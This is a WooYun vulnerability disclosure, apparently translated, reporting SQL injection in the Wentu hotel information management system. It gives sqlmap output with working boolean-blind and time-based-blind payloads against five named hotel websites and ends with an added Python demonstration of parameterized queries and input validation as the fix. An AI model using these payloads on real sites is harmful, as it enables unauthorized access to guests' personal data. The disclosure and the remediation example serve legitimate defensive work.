
Vulnerability summary

Defect ID: wooyun-2015-0106618

Title: SQL injection vulnerability in the Wentu (问途) Hotel Information Management System

Vendor: Guangzhou Wentu Information Technology Co., Ltd. (广州市问途信息技术有限公司)

Author: 路人甲

Submitted: 2015-04-09 14:55

Fixed: 2015-07-12 14:54

Disclosed: 2015-07-12 14:54

Vulnerability type: SQL injection

Severity: High

Self-rated Rank: 15

Status: handed to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-04-09: Details sent to the vendor; awaiting the vendor's response
2015-04-13: Vendor confirmed; details visible to the vendor only
2015-04-16: Details opened to third-party security partners
2015-06-07: Details opened to core white hats and domain experts
2015-06-17: Details opened to regular white hats
2015-06-27: Details opened to intern white hats
2015-07-12: Details opened to the public

Brief description:

Detailed description:

Google search: 技术支持: 问途酒店网络营销

[Screenshot: 1.jpg]

Case 1: http://www.goldenhotel.com.cn
Register a user, edit the profile, and capture the request.


[Screenshots: 2.jpg, 3.jpg, 4.jpg]


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: client_account (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: jsoncallback=jQuery18008583418767996372_1428046877163&client_account=sy_hjhj' AND 5892=5892 AND 'hQek'='hQek&language=zh-cn&param={"first_name":"123123","last_name":"1123123","mobile":"13521412321","account_id":"29348923@qq.com","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123","certificate_type":"%E8%BA%AB%E4%BB%BD%E8%AF%81","certificate":"123123123","company":"","position":"","country":"China , %E4%B8%AD%E5%9B%BD","province":"","city":"","address":"","postcode":"","love_hotel":"%E5%95%86%E5%8A%A1%E6%97%85%E8%A1%8C","smoke":"%E6%9C%89","age":"19-23","love_floor":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_bed":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_far":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_doss":"%E8%AF%B7%E9%80%89%E6%8B%A9"}}&_=1428046902896
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: jsoncallback=jQuery18008583418767996372_1428046877163&client_account=sy_hjhj' AND (SELECT * FROM (SELECT(SLEEP(5)))VrDV) AND 'kWXO'='kWXO&language=zh-cn&param={"first_name":"123123","last_name":"1123123","mobile":"13521412321","account_id":"29348923@qq.com","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123","certificate_type":"%E8%BA%AB%E4%BB%BD%E8%AF%81","certificate":"123123123","company":"","position":"","country":"China , %E4%B8%AD%E5%9B%BD","province":"","city":"","address":"","postcode":"","love_hotel":"%E5%95%86%E5%8A%A1%E6%97%85%E8%A1%8C","smoke":"%E6%9C%89","age":"19-23","love_floor":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_bed":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_far":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_doss":"%E8%AF%B7%E9%80%89%E6%8B%A9"}}&_=1428046902896
---
back-end DBMS: MySQL 5.0.12
current database: 'dossm'


Case 2: http://www.jadesea.cn/
Register a user, edit the profile, and capture the request.


[Screenshots: 5.jpg, 6.jpg, 7.jpg]


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: client_account (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: jsoncallback=jQuery183002090404491009734_1428047318069&client_account=sy_yhhotel' AND 8130=8130 AND 'VSoO'='VSoO&language=zh-cn&param={"first_name":"123123","last_name":"123123","mobile":"138521412365","account_id":"9283498@qq.com","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123123","certificate_type":"%E8%BA%AB%E4%BB%BD%E8%AF%81","certificate":"123123","company":"","position":"","country":"China , %E4%B8%AD%E5%9B%BD","province":"","city":"","address":"","postcode":"","love_hotel":"%E5%95%86%E5%8A%A1%E6%97%85%E8%A1%8C","smoke":"%E6%9C%89","age":"","love_floor":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_bed":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_far":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_doss":"%E8%AF%B7%E9%80%89%E6%8B%A9"}}&_=1428047339188
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: jsoncallback=jQuery183002090404491009734_1428047318069&client_account=sy_yhhotel' AND (SELECT * FROM (SELECT(SLEEP(5)))FFYs) AND 'ETTf'='ETTf&language=zh-cn&param={"first_name":"123123","last_name":"123123","mobile":"138521412365","account_id":"9283498@qq.com","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123123","certificate_type":"%E8%BA%AB%E4%BB%BD%E8%AF%81","certificate":"123123","company":"","position":"","country":"China , %E4%B8%AD%E5%9B%BD","province":"","city":"","address":"","postcode":"","love_hotel":"%E5%95%86%E5%8A%A1%E6%97%85%E8%A1%8C","smoke":"%E6%9C%89","age":"","love_floor":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_bed":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_far":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_doss":"%E8%AF%B7%E9%80%89%E6%8B%A9"}}&_=1428047339188
---
back-end DBMS: MySQL >= 5.0.0
current database: 'dossm'


Case 3: http://www.royalmarinaplaza.com
Register, edit the profile, and capture the request.


[Screenshots: 1.jpg, 2.jpg, 3.jpg]


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: client_account (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: jsoncallback=jQuery164018857463114227435_1428047679086&client_account=gz_marina' AND 4469=4469 AND 'XXFo'='XXFo&language=zh-cn&param={"last_name":"12312","first_name":"3123","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123123","certificate_type":"12312","certificate":"12312","email":"3123123@qq.com","phone":"123123123123","phone_type":"%E5%9B%BD%E5%86%85%E7%94%B5%E8%AF%9D","company":"","position":"","country":"%E4%B8%AD%E5%9B%BD","province":"%E5%B9%BF%E4%B8%9C","city":"","address":"","postcode":"","love_hotel":"on","age":"19-23","love_floor":"0","love_bed":"0","love_far":"0","smoke":"yes-smoking","love_doss":"0"}}&_=1428047706785
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: jsoncallback=jQuery164018857463114227435_1428047679086&client_account=gz_marina' AND (SELECT * FROM (SELECT(SLEEP(5)))TyVi) AND 'RIVg'='RIVg&language=zh-cn&param={"last_name":"12312","first_name":"3123","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123123","certificate_type":"12312","certificate":"12312","email":"3123123@qq.com","phone":"123123123123","phone_type":"%E5%9B%BD%E5%86%85%E7%94%B5%E8%AF%9D","company":"","position":"","country":"%E4%B8%AD%E5%9B%BD","province":"%E5%B9%BF%E4%B8%9C","city":"","address":"","postcode":"","love_hotel":"on","age":"19-23","love_floor":"0","love_bed":"0","love_far":"0","smoke":"yes-smoking","love_doss":"0"}}&_=1428047706785
---
back-end DBMS: MySQL >= 5.0.0
current database: 'dossm'


Case 4: http://www.xinyuexinhotel.com
Register, edit the profile, and capture the request.


[Screenshots: 1.jpg, 2.jpg, 3.jpg]


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: client_account (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: jsoncallback=jQuery191007966794349840756_1428048874667&client_account=yn_sbgarden') AND 9868=9868 AND ('PuSv'='PuSv&language=zh-cn&code=&param={"title":"%E5%A5%B3%E5%A3%AB","last_name":"123123","first_name":"123123","mobile":"13852141232","email":"234923948@qq.com","address":"123123","choose_reason":"%E4%BC%91%E9%97%B2%E5%BA%A6%E5%81%87","elevator":"%E5%96%9C%E6%AC%A2","smoke":"%E6%9C%89","bed_type":"%E5%A4%A7%E5%BA%8A","floor":"%E9%AB%98%E6%A5%BC%E5%B1%82","birthday":"2005-02-01","fields":{"title":"%E5%A5%B3%E5%A3%AB","last_name":"123123","first_name":"123123","mobile":"13852141232","email":"234923948@qq.com","address":"123123","choose_reason":"%E4%BC%91%E9%97%B2%E5%BA%A6%E5%81%87","elevator":"%E5%96%9C%E6%AC%A2","smoke":"%E6%9C%89","bed_type":"%E5%A4%A7%E5%BA%8A","floor":"%E9%AB%98%E6%A5%BC%E5%B1%82","birthday":"2005-02-01"}}&_=1428048874670
---
back-end DBMS: MySQL >= 5.0.0
current database: 'd2'


Case 5: http://www.resortintime.com
Register, edit the profile, and capture the request.


[Screenshots: 1.jpg, 2.jpg, 3.jpg]


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: client_account (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: jsoncallback=jQuery16405680112944196926_1428049876334&client_account=sy_resortintime' AND 6089=6089 AND 'NxGY'='NxGY&language=zh-cn&param={"first_name":"1123","last_name":"123123","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123","certificate_type":"123","certificate":"123","email":"23848324@qq.com","phone":"123123","phone_type":"%E5%9B%BD%E5%86%85%E7%94%B5%E8%AF%9D","company":"","position":"","country":"%E4%B8%AD%E5%9B%BD","province":"%E5%B9%BF%E4%B8%9C","city":"","address":"","postcode":"","love_hotel":"on","age":"19-23","love_floor":"0","love_bed":"0","love_far":"0","smoke":"yes-smoking","love_doss":"0"}}&_=1428049910430
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: jsoncallback=jQuery16405680112944196926_1428049876334&client_account=sy_resortintime' AND (SELECT * FROM (SELECT(SLEEP(10)))jkrZ) AND 'BqMN'='BqMN&language=zh-cn&param={"first_name":"1123","last_name":"123123","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123","certificate_type":"123","certificate":"123","email":"23848324@qq.com","phone":"123123","phone_type":"%E5%9B%BD%E5%86%85%E7%94%B5%E8%AF%9D","company":"","position":"","country":"%E4%B8%AD%E5%9B%BD","province":"%E5%B9%BF%E4%B8%9C","city":"","address":"","postcode":"","love_hotel":"on","age":"19-23","love_floor":"0","love_bed":"0","love_far":"0","smoke":"yes-smoking","love_doss":"0"}}&_=1428049910430
---
back-end DBMS: MySQL >= 5.0.0
current database: 'dossm'


List of affected sites:

Proof of vulnerability:

RS

Fix suggestion:

Filter the input.
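To make the fix concrete, here is an added example (written for this page, not the vendor's code) that reproduces the client_account injection from the sqlmap output above against a constructed in-memory table, then shows the two defences a practitioner would actually apply: a bound parameter instead of string formatting, and an allowlist check on the account identifier's shape. It assumes sqlite3 in place of the real MySQL backend and a hypothetical client table.

```python
import re
import sqlite3

# Added example, not the vendor's code. sqlite3 stands in for the MySQL backend
# so the demo runs offline; the table and rows below are constructed.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE client (client_account TEXT, first_name TEXT)")
    conn.executemany("INSERT INTO client VALUES (?, ?)",
                     [("sy_hjhj", "Zhang"), ("sy_yhhotel", "Li")])
    return conn

def lookup_vulnerable(conn, client_account):
    # The WHERE clause is built by string formatting, so the single quote in
    # the request value closes the literal and the rest runs as SQL.
    sql = "SELECT first_name FROM client WHERE client_account = '%s'" % client_account
    return [row[0] for row in conn.execute(sql)]

def lookup_fixed(conn, client_account):
    # Bound parameter: the whole value is one string literal, quotes included.
    sql = "SELECT first_name FROM client WHERE client_account = ?"
    return [row[0] for row in conn.execute(sql, (client_account,))]

# Every legitimate client_account in the report looks like "sy_hjhj" or
# "gz_marina": a two-letter site prefix, an underscore, lowercase letters/digits.
# Validating against that shape rejects the probes without a blacklist.
ACCOUNT_RE = re.compile(r"^[a-z]{2}_[a-z0-9]{1,32}$")

def is_valid_account(value):
    return ACCOUNT_RE.fullmatch(value) is not None

def demo():
    conn = make_db()
    true_probe = "sy_hjhj' AND 5892=5892 AND 'hQek'='hQek"   # boolean-blind probe from the report
    false_probe = "sy_hjhj' AND 5892=5893 AND 'hQek'='hQek"  # constructed false counterpart
    return {
        "vuln_true": lookup_vulnerable(conn, true_probe),    # ['Zhang']: injected AND is evaluated
        "vuln_false": lookup_vulnerable(conn, false_probe),  # []: the oracle sqlmap relies on
        "fixed_true": lookup_fixed(conn, true_probe),        # []: literal string matches nothing
        "fixed_plain": lookup_fixed(conn, "sy_hjhj"),        # ['Zhang']
        "validated": [is_valid_account(v) for v in ("sy_hjhj", "gz_marina", true_probe)],
    }
```

The difference between vuln_true and vuln_false is exactly the true/false oracle the boolean-blind technique in the sqlmap output depends on; with the bound parameter both probes return nothing.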

Copyright notice: credit 路人甲@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 16

Confirmed: 2015-04-13 14:52

Vendor reply:

CNVD did not directly reproduce the described issue; CNVD has notified the software vendor through the contact information published on its website.

Latest status:

None yet